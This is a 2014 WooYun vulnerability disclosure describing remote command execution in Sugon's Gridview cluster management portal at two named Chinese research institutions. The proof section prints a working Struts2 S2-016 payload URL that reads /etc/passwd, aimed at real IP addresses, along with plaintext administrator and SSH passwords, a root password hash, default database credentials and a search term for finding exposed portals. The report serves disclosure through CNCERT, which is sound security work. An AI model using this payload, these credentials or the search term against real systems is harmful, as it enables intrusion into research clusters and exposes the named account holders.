当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056890

漏洞标题:利用中科曙光集群管控平台漏洞轻松拿下超级计算机中心

相关厂商:sugon.com

漏洞作者: hacker@sina.cn

提交时间:2014-04-13 08:21

修复时间:2014-07-09 10:16

公开时间:2014-07-09 10:16

漏洞类型:远程代码执行

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-13: 细节已通知厂商并且等待厂商处理中
2014-04-18: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-06-12: 细节向核心白帽子及相关领域专家公开
2014-06-22: 细节向普通白帽子公开
2014-07-02: 细节向实习白帽子公开
2014-07-09: 细节向公众公开

简要描述:

最近在研究GPU群集,准备把手里的工作站升级一下,看了网上相关成功案例后,再看看手里的老山炮 一下子就迷茫了(显卡烧坏好几块了 =.=~#)。记得去年阿里的空虚浪子心在OWASP会上讲过hadoop的成功案例,还说如果能成功入职就有希望在这套系统里执行上一条命令,当时把我羡慕的嘴都合不上了,所以早就想搞一超算中心拿来爽一把了,这不就让我赶上一回。13TB内存、4864核CPU、80块Tesla K20 呵呵呵呵呵

详细说明:

Gridview集群监控管理系统
这是一款由中科曙光公司研发的大规模服务器集群管理软件 拥有强大的工作负载管理平台,用于简化HPC(超级计算机)集群的日常管理操作。具备监管超过5000个节点 大规模高性能计算中心或数据中心集群能力,该系统广泛应用于各大科研机构、高等院校的超级计算中心。
产品信息:
http://www.sugon.com/product/detail/productid/105.html

管理手册(据此了解到存在默认的MYSQL帐号和密码 root/root123)
http://wenku.baidu.com/view/dbce51e7195f312b3069a501.html
谷歌搜寻关键词:登录 /gridview_portal
本次测试包含以下单位:
1、中科院理论物理研究所
2、华南师范大学网络中心
测试过程简介:中科院某研究所的问题在于他们将具有重要信息的文档直接放在了所有人都可以访问的公网WEB门户上,文档中所涉及到的一些IP及内网拓扑部署情况均应为机要信息,不宜发布在公网,且文档内标识的专用于内网访问的存储系统管理平台却直接被允许了公网访问,这一结果违反了确保其安全的初衷,使得安全性极大的降低,一旦此类应用系统出现漏洞,将危及整个超算中心甚至机构内部的安全。
根据ParaStor平台采用的Struts框架测试得出系统存在S2-005、S2-016高危命令执行漏洞,并且应用运行于root权限,直接取得了服务器最高管理权,且通过该台服务器作为跳板可直接访问核心管理平台。结合网上发布的管理手册文档发现这两个管理平台使用了默认的数据库帐号/密码,结合数据库配置文件确认了一致性,能够成功登录数据库获取平台管理员帐号密码,且该密码在Gridview管控系统中是明文存储的,并存在弱口令的情况。
当非授权人员以管理员权限登录到Gridview管理平台后,可以批量对所有分布式服务器执行命令、文件、关机、用户管理等操作,相当于取得了该集群所有主机的控制权。
测试结果:所有已发现信息均整理在这里,WEBSHELL已经清除,系统中未留后门,亦未对除以下信息外的任何数据进行非法下载。
通报建议:请协助通报中科曙光公司及本次测试所含单位。

漏洞证明:

本应所内访问


存储管理平台


曙光集群


80个K20m显卡真土豪啊


gpu使用率


集群平台支持的管理功能


分布式执行命令和用户管理


实例1:
中科院理论物理研究所HPC配置文档:
http://www.itp.cas.cn/kxjs/fwzn/gxnjs/201309/P020130902605808036467.pdf
基于2.6版本的Gridview系统已探知两个Struts2框架命令执行漏洞:
http://struts.apache.org/release/2.3.x/docs/s2-005.html
http://struts.apache.org/release/2.3.x/docs/s2-016.html
漏洞网址:http://159.226.161.105:6080/gridview_portal/login.action
Gridview 2.6管理平台管理员信息:
admin●admin / root●sugon;!@# 邮箱:houfy@kitpc.ac.cn
ParaStor存储管理平台管理员信息:
admin●sugon;!@# 邮箱:houfy@139.com
shadow破解出的两个ssh帐号:
zhougaoliang●chen2zi3
yangziqing●chen2zi3 (可登录ParaStor存储管理平台)
数据库配置信息:
地址:jdbc:mysql://127.0.0.1:3309/gv_local
帐密:root●root123
网站物理路径: /tmp/tomcat-gridview_portal4547479399001117259.osgi
系统版本:CentOS release 6.2 (Final)
内核版本:2.6.32-220.el6.x86_64 i386
当前用户:root
S2-016 EXP示例:
http://159.226.161.105:6080/gridview_portal/login.action?redirect:${%23s%3dnew java.util.ArrayList(),%23x%3dnew java.lang.String("cat"),%23xx%3dnew java.lang.String("/etc/passwd"),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew java.io.InputStreamReader(%23a),%23c%3dnew java.io.BufferedReader(%23b),%23d%3dnew char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}
实例2:
漏洞网址:http://222.200.128.65:8080/gridview_portal/login.action
系统版本:Welcome to SUSE Linux Enterprise Server 10 SP2 (x86_64)
网站物理路径: /tmp/tomcat-gridview_portal6113238832243596521.osgi
系统版本: 2.6.16.60-0.42.4-smp i386
当前用户: root
用户哈希:root:$2a$10$Bct8k8UAbHRuGNuJ6OnhROu4UkYteXvW/qEWK0qzWlWI6asIrxvSG:15621::::::

修复方案:

请联系厂家售后技术支持热线:400-810-0466

版权声明:转载请注明来源 hacker@sina.cn@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-07-09 10:16

厂商回复:

最新状态:

2014-04-19:更新一下处置情况,在14日,CNCERT已经通过以往渠道,向软件生产厂商曙光公司通报,同时根据测试用例,向教育网和科技网应急组织通报。